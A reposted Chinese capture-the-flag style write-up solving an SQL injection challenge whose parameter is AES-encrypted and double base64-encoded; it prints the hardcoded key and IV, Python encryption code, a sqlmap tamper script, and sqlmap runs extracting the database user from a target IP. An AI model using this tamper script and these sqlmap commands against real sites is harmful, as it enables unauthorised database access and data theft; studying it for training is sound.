碼上快樂

相關內容    簡體    繁體

實戰經驗分享丨記一次SQL注入題目的解題思路

本文轉載自   查看原文   2020-05-13 14:29   1160    解題思路/ 工具/軟件分享/ 教程/書籍分享/ sql注入/ 網絡安全

本文是i春秋論壇(https://bbs.ichunqiu.com/)的表哥為大家分享一個在實戰過程中會經常遇到的SQL注入題目及解題思路,公眾號旨在為大家提供更多的學習方法與技能技巧,文章僅供學習參考。

 

這是一個比較基礎的題,在實戰中經常會遇到。比如說前端利用JavaScript公鑰加密並傳輸給后端,后端通過私鑰進行解密執行,這樣做的好處就在於可以有效的避免了中間人攻擊,跟SSL原理差不多,只是SSL在傳輸層,而這種加密是在應用層。

簡單介紹了一下分享這篇文章的原因,那么就開始進入主題吧~

 

源碼分析

先來看下后端的PHP源碼:

function decode($data){
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
    mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
    $data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    if(substr(trim($data),-6)!=='_mozhe'){
        echo '<script>window.location.href="/index.php";</script>';
    }else{
        return substr(trim($data),0,strlen(trim($data))-6);
    }
}

這是一個解密函數,我們來逐條分析。

$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');

首先定義了一個變量,這個變量調用了打開PHP crypto庫中的加密函數。定義了加密方法為AES加密,加密模式為CBC,數據塊為128位。

mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');

初始化加密緩沖區,描述為變量td。

加密密鑰為:ydhaqPQnexoaDuW3

$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));

進行兩次base64的解密后,使用上述方法進行將加密的密文還原成明文。

mcrypt_generic_deinit($td);
mcrypt_module_close($td);

結束加密,關閉加密模塊。

    if(substr(trim($data),-6)!=='_mozhe'){
        echo '<script>window.location.href="/index.php";</script>';
    }else{
        return substr(trim($data),0,strlen(trim($data))-6);
    }

如果明文的后6位不是_mozhe,那么解密函數將不返回數據,並且跳轉到index.php上。

如果明文后6位是_mozhe,那么將返回加密值,並且去掉后面的_mozhe。

 

使用python構造加密函數

既然都已經知道了解密函數的寫法,那就反推寫出加密函數就好了。

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
home.php?mod=space&uid=210785    :   cryptomozhe.py   
@Author  :   Angel
home.php?mod=space&uid=163876    :   W3bSafe

'''

from base64 import b64decode,b64encode
from Crypto.Cipher import  AES

def encrypt(text):
    cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
    length = 16
    count = len(text)
    add=count % length
    if add:
        text = text + ('\0' * (length-add))
    ciphertext = cryptor.encrypt(text)
    return b64encode(b64encode(ciphertext))

def decrypt(text):
    cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
    length = 16
    count = len(text)
    add=count % length
    if add:
        text = text + ('\0' * (length-add))
    ciphertext = cryptor.decrypt(b64decode(b64decode(text)))
    return ciphertext
if __name__ == '__main__':
    print("encrypt:"+encrypt(str(raw_input("Please input text with encrypt:"))))
    print("decrypt:"+decrypt(str(raw_input("Please input text with decrypt:"))))

來嘗試下寫的加解密腳本是否正確與通用,首先我們先用這個Python腳本對明文:This is a test value_mozhe進行加密,得到加密后的結果為密文:

ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=

 

Please input text with encrypt:This is a test value_mozhe
encrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=
Please input text with decrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=
decrypt:This is a test value_mozhe      

然后在寫一個PHP文件,使用題目中所給的php函數對剛剛加密過的密文進行解密。

<?phpfunction decode($data){    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
    mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
    $data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    if(substr(trim($data),-6)!=='_mozhe'){
        echo '<script>window.location.href="/index.php";</script>';
    }else{
        return substr(trim($data),0,strlen(trim($data))-6);
    }}$val="ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=";echo decode($val);

執行結果:

 

解密成功。

 

構造sqlmap tamper腳本,進行注入測試

已經驗證了python加密函數的可行性,那么直接把構造好的加密函數寫成sqlmap,能運行的tamper腳本就ok了。別忘了要在明文后面加上_mozhe:

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File    :   mozhe.py   
@Author  :   Angel
@Team    :   W3bSafe

'''

import base64
from Crypto.Cipher import  AES
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW

def encrypt(text):
    cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
    length = 16
    count = len(text)
    add=count % length
    if add:
        text = text + ('\0' * (length-add))
    ciphertext = cryptor.encrypt(text)
    return base64.b64encode(ciphertext)

def dependencies():
    pass
def tamper(payload, **kwargs):
    payload=encrypt((payload+"_mozhe").encode('utf-8'))
    payload=base64.b64encode(payload)
    return payload

讓sqlmap加載tamper進行注入測試:

PS C:\WINDOWS\system32> sqlmap -u "http://219.153.49.228:40570/news/list.php?id=" --tamper=mozhe --dbms=mysql --technique=E
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.5.10#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:43:43

[11:43:43] [INFO] loading tamper module 'mozhe'
[11:43:44] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:43:44] [INFO] testing connection to the target URL
[11:43:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:43:44] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[11:43:44] [INFO] testing for SQL injection on GET parameter 'id'
[11:43:44] [INFO] testing 'MySQL >= 5.0 與-AND 基於報錯注入 - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:44] [INFO] testing 'MySQL >= 5.0 基於報錯注入 - Parameter replace (FLOOR)'
[11:43:45] [INFO] GET parameter 'id' is 'MySQL >= 5.0 基於報錯注入 - Parameter replace (FLOOR)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 9 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 基於報錯注入 - Parameter replace (FLOOR)
    Payload: id=(SELECT 1957 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[11:43:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:43:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0
[11:43:47] [INFO] fetched data logged to text files under 'C:\Users\admin\.sqlmap\output\219.153.49.228'

[*] shutting down at 11:43:47

 

查詢注入語句:

PS C:\WINDOWS\system32> sqlmap -u "http://219.153.49.228:40570/news/list.php?id=" --tamper=mozhe --dbms=mysql --technique=E -v 3 --current-user
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.5.10#dev}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:46:20
[11:46:20] [DEBUG] cleaning up configuration parameters
[11:46:20] [INFO] loading tamper module 'mozhe'
[11:46:20] [DEBUG] setting the HTTP timeout
[11:46:20] [DEBUG] creating HTTP requests opener object
[11:46:20] [DEBUG] forcing back-end DBMS to user defined value
[11:46:21] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:46:21] [INFO] testing connection to the target URL
[11:46:21] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 基於報錯注入 - Parameter replace (FLOOR)
    Payload: id=(SELECT 1957 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Vector: (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---[11:46:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:46:21] [INFO] testing MySQL
[11:46:21] [DEBUG] searching for error chunk length...
[11:46:21] [PAYLOAD] RFA2U25sUmZkKzFxMWdtL1p2V2UwS0ZLWWVvdGx3cHJSTjRGZm56aDRteHRFdDZWbCtvRzdwK1gzTVV1cnFEaElYVStxcEFoWlg3ZzlkRldQaUFkL0J5Zzc4ZW1XT3pPS09BRU9kM3RodUFWNHdHNUFmQlNsMmh1cVZaQkNLQzRmVlhMUVV3SmVxUUw3RWNpVGdyNGNFbm8rTnZZNnFrK1BVWm1heloyUWNOQjBHUEpTTzIzNmkxVU5hcSs2MkpxUXRIbjNFK2l1dG5lZU8raWhlaUhLTHBRMVdNS3k2RWxaMlZWbnZHaEU4MD0=
[11:46:21] [PAYLOAD] eWhEcGExNjE4RVlaQWxtY0NHc0paRTNKZ3FkQmFYZFBRa3dqRVQ2Z255c2ZqdGtuZHJ3UUV2Z0hxM2ZBVUszOU5wRCtRd3dSamxMQjNNdi9IaG5OV1d0cW5lMERWeTloY1VOTDJ6T2RmT3ZURnk1L29Ici81MmJVR3E2eXFvL0VxUWY4dzM0SGp2WHBidFF1amJHdUJNcGx1djBqbEJQQmljNUpna0RXV1JjVCtYVWhraWRGSDNEN0g5a2Robk9uc0MxUTl1djFuU1c3b3ZER0lVVE1XTWlFdEhYNFhzQWl6dzdvYnZQMWozdz0=
[11:46:21] [PAYLOAD] d3FlMjAyVFRiZVRPaEx1RWVGMW9kajRzUFRVQVkzMmtFMk4vZ0dCOHQranVkZ2o5dkFubnBTY0NWTG5oUnpXUk4wNWN6YXNRQjRWMVBzaFk4ZTBTV3pXMm9mWFRLT0FnNHVFWE1IVjdMNTFhNEs0a2Q4RmNCcmxUd2ZMNjVVOWlpU1llcW9uM1VaTk4wYzN1VWR4aFJvQUpBVG85VFVnd3JXSlE4UHk2UEwzbGMwekhNbFRCVlFpN1RtUU5MN1BDeVBnRUQwQkd5UVJIcGpjS1N0RG5CUWk3N0VyOEI2UWFhRElFSXR2cHFzOD0=
[11:46:21] [PAYLOAD] RDBtcGNRSlpGczgwc2dlMEVoV3A0Y3NJeEJMeEZsU3R2cDFwdGlvUDhDK3ZKeTZjTmN0Y21rSEJRWUZjckU3MWs3SWloWFZYeGR4a29hOUlhSlZJdS9kUmxlWnAxcm1DdGYxeUlEendlSGNKVkZ0WVdMaERob0QvTFdqUFViRDgxeitOVUdHcTdpdWdsRDYvUHMza3dNVU0xRUFDZXZkd1EvelR0cDRVWThEV2pqS05CVEdibDFzWXUwMlNwbzdyWitHK09CVkNlY3hIT3ljYlA0WXRiZ1gzcXBQUFNqbHVEcXF5VHhWUllRTT0=
[11:46:21] [PAYLOAD] RGpHTFQ3b21KMytJL2dMWWs5aTlnWklRTG1rQkYwKzRDYjc5TGxOSnBtVlVxZjRuZ1pBcGVFUk1DS05QNFNIbUVaQlIyZTc4WVJ3djVweHJIMi96K3FkcWs5SkZ6V1B5dWZUSHM1R1I2SCtCYkprNHI5elA0TStVdXJ6RGN0c3NHVytFaERGMCsvcWVmWjNwcncrZXk1VnNtN1hQRWhaOUZUeGxNK3JkeGZsUUtSK2RwR3J1Wm9tOVBDTDFnZncwUkhGa08zWEhmZHg3eHZrTHYxd2FycEtYeVlxMHhxcUo1ZVB2Ym1nbWw5YXFFY3VrNW80SlN6dFBRbU5FNFZRV1FKOWZlcVZpQ21jVUpFcUNFd3BINVE9PQ==
[11:46:21] [DEBUG] performed 5 queries in 0.35 seconds
[11:46:21] [INFO] confirming MySQL
[11:46:21] [PAYLOAD] OTF0QkkwZDFQVm9od003UGR6dUxGS3hrcUlXT3RJSTExUlkrRmpwcjV5cWZ3MTNpc0dia3NUQU11UnR**c4b1RBREhRbHlPL1h6UUJDY01mYmRoQktHcXY0YWdIZVFaZ08va0NNTzdtcms5bGJNQ2VoUUNYeC9weFE5dEZvdzdIdmJuUDJXTzNqdHdNc0VjcnV6ZWw0L3NMRWx5dXdZMzNYUlluUndGMEtLYW9GZ0hvT2FjOWVsdFVWdGdTZEVnQUZ3S1AzRDBYUEdwUUV2UUx1c2RFa041NTF3UERDVlJPcHQzRzdXMEtOSlA0dEJiRXpGeE1zTlUwTmpXTmFCdVNRdG1YaE5WelVldmlxL1VsY1d4bHc9PQ==
[11:46:21] [DEBUG] performed 1 queries in 0.07 seconds
[11:46:21] [PAYLOAD] Q0dLbmNOU1FkMFgybFQ0d1ozS3RNVmtlaTVPdVdrUzg2VzQwRFNXM2ZuYlpMaURTZmd2ZC9NV1U0b2tsT1FxT3FmekJGSjdWR0JiNG5HS3ViMktnNmRTU0xzZit6RkJUcjkvVjF5RlhObzdXdzBjSkpJYW5KaWN0ZU5rU25FcDlKV1poMFRDQzN0bEx0bzJteTBEQVhNbkR1eEJYWjNlOWk1Wkp2OGZ6T3RYS2M1OGJCS2htamQxajdXWmIyZ3V0a0FncFRVMFZCWm1aVVZ4QnhXOEJRTUtWZC9Fd0lmaUdNSlFTNHNrSUV5L1Uxb3hoWVdDcGNFcXpvVXRhUHcrWTlPbXFTb0t1RVBsQXF3bFVCakYzdVljNFRYcTg1Y3hsRjFFcy8wbEY4TTA9
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
[11:46:21] [PAYLOAD] ank5ZzZJb3ZNOWFvR2JhQWQrRG9OUmY1MnlIczZMalZiY0IweS9leUp5WitncTlubU5ML0cvT0RmTTV2QmpiRWhiSktMazA0UkNkSEU3ZkJCTmhmNGlrQ0JtMVh2c0xFSGg4STcrTzVObWRpYlNXTUtVY0RpVDcrT3g5czdaTzNmY1NzTnNrSnJ6VmppZ2lNUWI4QVBIajlDVktRdG1yb0ZBcGpXa3N2ejNZbTE1UUZHdnBZSC91U09IM1hCeHg2VlV6Ni9mWHlEZlZ3WDhnSjI4dDJtc3l4SXJlRGVEVjhkZEJKZjg1dWtyVDRZcjFwbWlhRVJPcHJpbThyblFNeHNHKytkT2t1c2tLb2VpdHdSMjJLc09RQlpqam5MbUhaUUZ5Vzc0dkk2SUE9
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
[11:46:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[11:46:21] [INFO] fetching current user
[11:46:21] [PAYLOAD] dGV3cy9FUklKc3lJei9iV1lzVzhFck5DaDJzY1UvQVV3bXQ4NERwOFRkMi9ncGExU0JLRnNYSitDQ3lVVlZUZmxUcFFDUFRzckhJS2tLVVRDbHlUZjZSenVEWW05aytrN3BYdEwxT3g2aXJLc1BjWXRzZThSa2FiN0FhVkF6Q0RHek5tSFNncjR6RnJ5TjFKRkxZMi9YMmlMV0Zrc3RLbTNCbDFmUzZJTEhPM2l1dGhrRkpDOTh5S1c3S1dGV0E3QTNNaWY4SFNCdHJmS0FpZmQ4ajhBT1d5RjFtaVR5TnBjOGx5WGVxN09kVHJlUFRURTZNL2JCeUNRSnVQa20xWkxZRW9FZytiRzRsZ1lsdzRKa1hPWlE9PQ==
[11:46:21] [INFO] retrieved: root@localhost
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
current user:    'root@localhost'
[11:46:21] [INFO] fetched data logged to text files under 'C:\Users\admin\.sqlmap\output\219.153.49.228'
[*] shutting down at 11:46:21
PS C:\WINDOWS\system32>

 

對sqlmap的payload進行測試。

 

完成。

今天的文章分享,小伙伴們看懂了嗎?


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 記一次SQL注入實戰 MongoDB實戰經驗分享 一次.NET項目反編譯的實戰經驗(WinForm) RabbitMQ實戰經驗分享 一次非常成功的項目經驗分享和糟糕項目的對比 實戰經驗丨CTF中文件包含的技巧總結 記一次Redis+Getshell經驗分享 記一次CTF比賽過程與解題思路-MISC部分 記一次實戰MSSQL注入繞過WAF unity 熱更新 c# 實戰經驗分享(一)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM